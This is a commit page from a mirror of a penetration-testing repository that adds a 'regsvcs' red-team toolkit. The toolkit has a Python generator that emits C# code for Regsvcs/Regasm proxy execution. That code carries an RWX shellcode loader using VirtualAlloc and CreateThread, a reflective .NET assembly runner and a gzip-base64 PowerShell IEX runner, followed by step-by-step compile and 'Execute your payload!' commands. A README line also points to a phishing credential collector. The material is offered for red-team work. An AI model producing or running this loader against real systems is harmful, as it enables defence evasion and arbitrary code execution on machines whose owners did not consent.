mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-22 10:31:38 +01:00
Added regsvcs directory
This commit is contained in:
parent
4bd6cfe600
commit
2af3ce7d73
@ -316,6 +316,8 @@ $ ./markOwnedNodesInNeo4j.py kerberoasted.txt
|
|||||||
|
|
||||||
- [**`PhishingPost`**](https://github.com/mgeeky/PhishingPost) - (PHP Script intdended to be used during Phishing campaigns as a credentials collector linked to backdoored HTML <form> action parameter.
|
- [**`PhishingPost`**](https://github.com/mgeeky/PhishingPost) - (PHP Script intdended to be used during Phishing campaigns as a credentials collector linked to backdoored HTML <form> action parameter.
|
||||||
|
|
||||||
|
- [**`regsvcs`**](https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/red-teaming/regsvcs) - Set of scripts, requirements and instructions for generating .NET Assemblies valid for **Regasm**/**Regsvcs** code execution primitives.
|
||||||
|
|
||||||
- [**`RobustPentestMacro`**](https://github.com/mgeeky/RobustPentestMacro) - This is a rich-featured Visual Basic macro code for use during Penetration Testing assignments, implementing various advanced post-exploitation techniques.
|
- [**`RobustPentestMacro`**](https://github.com/mgeeky/RobustPentestMacro) - This is a rich-featured Visual Basic macro code for use during Penetration Testing assignments, implementing various advanced post-exploitation techniques.
|
||||||
|
|
||||||
|
|
||||||
|
@ -274,7 +274,7 @@ def minimize(output):
|
|||||||
|
|
||||||
def opts(argv):
|
def opts(argv):
|
||||||
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>')
|
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>')
|
||||||
parser.add_argument('inputFile', help = 'Input file to be encoded within XML. May be either Powershell script or PE/EXE file.')
|
parser.add_argument('inputFile', help = 'Input file to be encoded within XML. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.')
|
||||||
parser.add_argument('-m', '--minimize', action='store_true', help = 'Minimize the output XML file.')
|
parser.add_argument('-m', '--minimize', action='store_true', help = 'Minimize the output XML file.')
|
||||||
parser.add_argument('-b', '--encode', action='store_true', help = 'Base64 encode output XML file.')
|
parser.add_argument('-b', '--encode', action='store_true', help = 'Base64 encode output XML file.')
|
||||||
parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!')
|
parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!')
|
||||||
@ -296,7 +296,7 @@ def main(argv):
|
|||||||
|
|
||||||
''')
|
''')
|
||||||
if len(argv) < 2:
|
if len(argv) < 2:
|
||||||
print('Usage: ./generateMSBuildPowershellXML.py <inputFile>')
|
print('Usage: ./generateMSBuildXML.py <inputFile>')
|
||||||
sys.exit(-1)
|
sys.exit(-1)
|
||||||
|
|
||||||
args = opts(argv)
|
args = opts(argv)
|
||||||
|
46
red-teaming/regsvcs/README.md
Normal file
46
red-teaming/regsvcs/README.md
Normal file
@ -0,0 +1,46 @@
|
|||||||
|
## Rogue .NET Assembly for Regsvcs/Regasm Code Execution
|
||||||
|
|
||||||
|
Follow below described steps to properly generate your source code and then compile it to a .NET Assembly valid for Regasm/Regsvcs:
|
||||||
|
|
||||||
|
### Step 1: Generate key.snk file
|
||||||
|
|
||||||
|
```
|
||||||
|
powershell -file build.ps1
|
||||||
|
```
|
||||||
|
|
||||||
|
### Step 2: Generate source code file
|
||||||
|
|
||||||
|
```
|
||||||
|
python3 generateRegsvcs.py -r payload.bin > program.cs
|
||||||
|
```
|
||||||
|
|
||||||
|
### Step 3: Compilate library .NET Assembly
|
||||||
|
|
||||||
|
```
|
||||||
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
||||||
|
```
|
||||||
|
|
||||||
|
If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be:
|
||||||
|
|
||||||
|
```
|
||||||
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Step 4: Code execution via Regsvcs or Regasm:
|
||||||
|
|
||||||
|
```
|
||||||
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
|
||||||
|
```
|
||||||
|
or
|
||||||
|
```
|
||||||
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
|
||||||
|
```
|
||||||
|
or
|
||||||
|
```
|
||||||
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll
|
||||||
|
```
|
||||||
|
or
|
||||||
|
```
|
||||||
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
|
||||||
|
```
|
BIN
red-teaming/regsvcs/System.Management.Automation.dll
Normal file
BIN
red-teaming/regsvcs/System.Management.Automation.dll
Normal file
Binary file not shown.
5
red-teaming/regsvcs/build.ps1
Normal file
5
red-teaming/regsvcs/build.ps1
Normal file
@ -0,0 +1,5 @@
|
|||||||
|
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
|
||||||
|
$Content = [System.Convert]::FromBase64String($key)
|
||||||
|
Set-Content key.snk -Value $Content -Encoding Byte
|
||||||
|
|
||||||
|
& "$env:Windir\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
360
red-teaming/regsvcs/generateRegsvcs.py
Normal file
360
red-teaming/regsvcs/generateRegsvcs.py
Normal file
@ -0,0 +1,360 @@
|
|||||||
|
#!/usr/bin/python3
|
||||||
|
#
|
||||||
|
# Red-Teaming script that constructs C# code for Regsvcs code execution technique.
|
||||||
|
#
|
||||||
|
# Step 1: Generate source code file
|
||||||
|
# cmd> python3 generateRegsvcs.py -r payload.bin > program.cs
|
||||||
|
#
|
||||||
|
# Step 2: Compilate library .NET Assembly
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
||||||
|
#
|
||||||
|
# if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used
|
||||||
|
# to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script).
|
||||||
|
# Then proper compilation command will be:
|
||||||
|
#
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Step 3: Code execution via Regsvcs or Regasm:
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
|
||||||
|
# or
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
|
||||||
|
# or
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll
|
||||||
|
# or
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
|
||||||
|
#
|
||||||
|
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
#
|
||||||
|
|
||||||
|
import re
|
||||||
|
import os
|
||||||
|
import io
|
||||||
|
import sys
|
||||||
|
import gzip
|
||||||
|
import base64
|
||||||
|
import string
|
||||||
|
import struct
|
||||||
|
import random
|
||||||
|
import binascii
|
||||||
|
import argparse
|
||||||
|
|
||||||
|
|
||||||
|
def getCompressedPayload(filePath):
|
||||||
|
out = io.BytesIO()
|
||||||
|
encoded = ''
|
||||||
|
with open(filePath, 'rb') as f:
|
||||||
|
inp = f.read()
|
||||||
|
|
||||||
|
with gzip.GzipFile(fileobj = out, mode = 'w') as fo:
|
||||||
|
fo.write(inp)
|
||||||
|
|
||||||
|
encoded = base64.b64encode(out.getvalue())
|
||||||
|
|
||||||
|
powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format(
|
||||||
|
encoded.decode()
|
||||||
|
)
|
||||||
|
return powershell
|
||||||
|
|
||||||
|
def getSourceFileContents(payload, _format):
|
||||||
|
launchCode = ''
|
||||||
|
usings = ''
|
||||||
|
|
||||||
|
if _format == 'exe':
|
||||||
|
|
||||||
|
exeLaunchCode = string.Template('''
|
||||||
|
public static void Execute() {
|
||||||
|
|
||||||
|
string payload = "$payload2";
|
||||||
|
byte[] decoded = System.Convert.FromBase64String(payload);
|
||||||
|
|
||||||
|
Assembly asm = Assembly.Load(decoded);
|
||||||
|
MethodInfo method = asm.EntryPoint;
|
||||||
|
object instance = asm.CreateInstance(method.Name);
|
||||||
|
method.Invoke(instance, null);
|
||||||
|
|
||||||
|
}''').safe_substitute(
|
||||||
|
payload2 = base64.b64encode(payload.encode()).decode()
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
launchCode = exeLaunchCode
|
||||||
|
|
||||||
|
elif _format == 'raw':
|
||||||
|
|
||||||
|
foo = str(binascii.hexlify(payload), 'ascii')
|
||||||
|
fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)]
|
||||||
|
encodedPayload = ' '
|
||||||
|
|
||||||
|
for i in range(len(fooarr)):
|
||||||
|
if i % 16 == 0 and i > 0:
|
||||||
|
encodedPayload += '\n '
|
||||||
|
encodedPayload += '{}, '.format(fooarr[i])
|
||||||
|
|
||||||
|
encodedPayload = encodedPayload.strip()[:-1]
|
||||||
|
|
||||||
|
shellcodeLoader = string.Template('''
|
||||||
|
[DllImport("kernel32")]
|
||||||
|
private static extern IntPtr VirtualAlloc(
|
||||||
|
IntPtr lpAddress, UIntPtr dwSize,
|
||||||
|
UInt32 flAllocationType,
|
||||||
|
UInt32 flProtect
|
||||||
|
);
|
||||||
|
|
||||||
|
[DllImport("kernel32")]
|
||||||
|
private static extern bool VirtualFree(
|
||||||
|
IntPtr lpAddress,
|
||||||
|
UInt32 dwSize,
|
||||||
|
UInt32 dwFreeType
|
||||||
|
);
|
||||||
|
|
||||||
|
[DllImport("kernel32")]
|
||||||
|
private static extern IntPtr CreateThread(
|
||||||
|
UInt32 lpThreadAttributes,
|
||||||
|
UInt32 dwStackSize,
|
||||||
|
IntPtr lpStartAddress,
|
||||||
|
IntPtr param,
|
||||||
|
UInt32 dwCreationFlags,
|
||||||
|
ref UInt32 lpThreadId
|
||||||
|
);
|
||||||
|
|
||||||
|
[DllImport("kernel32")]
|
||||||
|
private static extern bool CloseHandle(
|
||||||
|
IntPtr hHandle
|
||||||
|
);
|
||||||
|
|
||||||
|
[DllImport("kernel32")]
|
||||||
|
private static extern UInt32 WaitForSingleObject(
|
||||||
|
IntPtr hHandle,
|
||||||
|
UInt32 dwMilliseconds
|
||||||
|
);
|
||||||
|
|
||||||
|
private static UInt32 MEM_COMMIT = 0x1000;
|
||||||
|
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
|
||||||
|
private static UInt32 MEM_RELEASE = 0x8000;
|
||||||
|
|
||||||
|
public static void Execute() {
|
||||||
|
|
||||||
|
byte[] payload = new byte[$payloadSize] {
|
||||||
|
$payload2
|
||||||
|
};
|
||||||
|
|
||||||
|
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||||
|
Marshal.Copy(payload, 0, funcAddr, payload.Length);
|
||||||
|
IntPtr hThread = IntPtr.Zero;
|
||||||
|
UInt32 threadId = 0;
|
||||||
|
|
||||||
|
hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId);
|
||||||
|
WaitForSingleObject(hThread, 0xFFFFFFFF);
|
||||||
|
|
||||||
|
CloseHandle(hThread);
|
||||||
|
VirtualFree(funcAddr, 0, MEM_RELEASE);
|
||||||
|
|
||||||
|
}''').safe_substitute(
|
||||||
|
payload2 = encodedPayload,
|
||||||
|
payloadSize = len(payload)
|
||||||
|
)
|
||||||
|
|
||||||
|
launchCode = shellcodeLoader
|
||||||
|
|
||||||
|
else:
|
||||||
|
usings += '''
|
||||||
|
using System.Management.Automation;
|
||||||
|
using System.Management.Automation.Runspaces;
|
||||||
|
'''
|
||||||
|
powershellLaunchCode = string.Template('''
|
||||||
|
public static void Execute() {
|
||||||
|
|
||||||
|
byte[] payload = System.Convert.FromBase64String("$payload2");
|
||||||
|
string decoded = System.Text.Encoding.UTF8.GetString(payload);
|
||||||
|
|
||||||
|
Runspace runspace = RunspaceFactory.CreateRunspace();
|
||||||
|
runspace.Open();
|
||||||
|
|
||||||
|
Pipeline pipeline = runspace.CreatePipeline();
|
||||||
|
pipeline.Commands.AddScript(decoded);
|
||||||
|
pipeline.Invoke();
|
||||||
|
|
||||||
|
runspace.Close();
|
||||||
|
}''').safe_substitute(
|
||||||
|
payload2 = base64.b64encode(payload.encode()).decode()
|
||||||
|
)
|
||||||
|
|
||||||
|
launchCode = powershellLaunchCode
|
||||||
|
|
||||||
|
|
||||||
|
template = string.Template('''
|
||||||
|
using System;
|
||||||
|
using System.Diagnostics;
|
||||||
|
using System.Reflection;
|
||||||
|
using System.Runtime.InteropServices;
|
||||||
|
using System.EnterpriseServices;
|
||||||
|
$usings
|
||||||
|
|
||||||
|
/*
|
||||||
|
Author: Casey Smith, Twitter: @subTee
|
||||||
|
Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
License: BSD 3-Clause
|
||||||
|
|
||||||
|
Step 1: Create Your Strong Name Key -> key.snk
|
||||||
|
|
||||||
|
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
|
||||||
|
$Content = [System.Convert]::FromBase64String($key)
|
||||||
|
Set-Content key.snk -Value $Content -Encoding Byte
|
||||||
|
|
||||||
|
Step 2: Compile source code:
|
||||||
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
||||||
|
|
||||||
|
Step 3: Execute your payload!
|
||||||
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe regsvcs.dll
|
||||||
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe regsvcs.dll
|
||||||
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U regsvcs.dll
|
||||||
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U regsvcs.dll
|
||||||
|
*/
|
||||||
|
|
||||||
|
namespace Program
|
||||||
|
{
|
||||||
|
public class Bypass : ServicedComponent
|
||||||
|
{
|
||||||
|
public Bypass()
|
||||||
|
{
|
||||||
|
}
|
||||||
|
|
||||||
|
// This executes if registration is successful
|
||||||
|
[ComRegisterFunction]
|
||||||
|
public static void RegisterClass( string key )
|
||||||
|
{
|
||||||
|
Shellcode.Execute();
|
||||||
|
}
|
||||||
|
|
||||||
|
// This executes if registration fails
|
||||||
|
[ComUnregisterFunction]
|
||||||
|
public static void UnRegisterClass( string key )
|
||||||
|
{
|
||||||
|
Shellcode.Execute();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
public class Shellcode
|
||||||
|
{
|
||||||
|
$launchCode
|
||||||
|
}
|
||||||
|
}''').safe_substitute(
|
||||||
|
launchCode = launchCode,
|
||||||
|
usings = usings
|
||||||
|
)
|
||||||
|
|
||||||
|
return template
|
||||||
|
|
||||||
|
def detectFileIsExe(filePath, forced = False):
|
||||||
|
first1000 = []
|
||||||
|
|
||||||
|
with open(filePath, 'rb') as f:
|
||||||
|
first1000 = f.read()[:1000]
|
||||||
|
|
||||||
|
if not (first1000[0] == 'M' and first1000[1] == 'Z'):
|
||||||
|
return False
|
||||||
|
|
||||||
|
elfanew = struct.unpack('<H', first1000[0x3c:0x3c + 2])[0]
|
||||||
|
|
||||||
|
if not (first1000[elfanew + 0] == 'P' and first1000[elfanew + 1] == 'E'):
|
||||||
|
return False
|
||||||
|
|
||||||
|
dosStub = "This program cannot be run in DOS mode."
|
||||||
|
printables = ''.join([x for x in first1000[0x40:] if x in string.printable])
|
||||||
|
|
||||||
|
#if not dosStub in printables:
|
||||||
|
# return False
|
||||||
|
return True
|
||||||
|
|
||||||
|
|
||||||
|
def opts(argv):
|
||||||
|
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>')
|
||||||
|
parser.add_argument('inputFile', help = 'Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.')
|
||||||
|
parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!')
|
||||||
|
parser.add_argument('-r', '--raw', action='store_true', help = 'Specified input file is a raw Shellcode to be injected in self process in a separate Thread.')
|
||||||
|
|
||||||
|
args = parser.parse_args()
|
||||||
|
|
||||||
|
if args.exe and args.raw:
|
||||||
|
sys.stderr.write('[!] --exe and --raw options are mutually exclusive!\n')
|
||||||
|
sys.exit(-1)
|
||||||
|
|
||||||
|
return args
|
||||||
|
|
||||||
|
def main(argv):
|
||||||
|
sys.stderr.write('''
|
||||||
|
:: Regsvcs Code Execution Source code generation utility
|
||||||
|
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm.
|
||||||
|
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
|
''')
|
||||||
|
if len(argv) < 2:
|
||||||
|
print('Usage: ./generateRegsvcs.py <inputFile>')
|
||||||
|
sys.exit(-1)
|
||||||
|
|
||||||
|
args = opts(argv)
|
||||||
|
|
||||||
|
_format = 'powershell'
|
||||||
|
|
||||||
|
if args.exe:
|
||||||
|
if not detectFileIsExe(args.inputFile, args.exe):
|
||||||
|
sys.stderr.write('[?] File not recognized as PE/EXE.\n\n')
|
||||||
|
return False
|
||||||
|
|
||||||
|
_format = 'exe'
|
||||||
|
sys.stderr.write('[?] File recognized as PE/EXE.\n\n')
|
||||||
|
with open(args.inputFile, 'rb') as f:
|
||||||
|
payload = f.read()
|
||||||
|
|
||||||
|
elif args.raw:
|
||||||
|
_format = 'raw'
|
||||||
|
sys.stderr.write('[?] File specified as raw Shellcode.\n\n')
|
||||||
|
with open(args.inputFile, 'rb') as f:
|
||||||
|
payload = f.read()
|
||||||
|
|
||||||
|
else:
|
||||||
|
sys.stderr.write('[?] Powershell code given.\n')
|
||||||
|
sys.stderr.write('[?] WARNING: You need to have System.Management.Automation assemblies preinstalled.\n')
|
||||||
|
sys.stderr.write(' Obtain them from: .\n\n')
|
||||||
|
|
||||||
|
if args.inputFile.endswith('.exe'):
|
||||||
|
return False
|
||||||
|
|
||||||
|
payload = getCompressedPayload(args.inputFile)
|
||||||
|
|
||||||
|
output = getSourceFileContents(payload, _format)
|
||||||
|
|
||||||
|
print(output)
|
||||||
|
|
||||||
|
management = ''
|
||||||
|
if _format == 'powershell':
|
||||||
|
management = ' /r:System.Management.Automation.dll'
|
||||||
|
|
||||||
|
commands = '''
|
||||||
|
|
||||||
|
=====================================
|
||||||
|
|
||||||
|
Step 1: Create Your Strong Name Key -> key.snk
|
||||||
|
|
||||||
|
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
|
||||||
|
$Content = [System.Convert]::FromBase64String($key)
|
||||||
|
Set-Content key.snk -Value $Content -Encoding Byte
|
||||||
|
|
||||||
|
Step 2: Compile source code:
|
||||||
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
||||||
|
|
||||||
|
Step 3: Execute your payload!
|
||||||
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe regsvcs.dll
|
||||||
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe regsvcs.dll
|
||||||
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U regsvcs.dll
|
||||||
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U regsvcs.dll
|
||||||
|
'''.format(management)
|
||||||
|
|
||||||
|
if 'PROGRAMFILES(X86)' in os.environ:
|
||||||
|
commands = commands.replace('Framework', 'Framework64')
|
||||||
|
|
||||||
|
sys.stderr.write(commands)
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
main(sys.argv)
|
BIN
red-teaming/regsvcs/key.snk
Normal file
BIN
red-teaming/regsvcs/key.snk
Normal file
Binary file not shown.
BIN
red-teaming/regsvcs/program.cs
Normal file
BIN
red-teaming/regsvcs/program.cs
Normal file
Binary file not shown.
BIN
red-teaming/regsvcs/regsvcs.dll
Normal file
BIN
red-teaming/regsvcs/regsvcs.dll
Normal file
Binary file not shown.
Loading…
Reference in New Issue
Block a user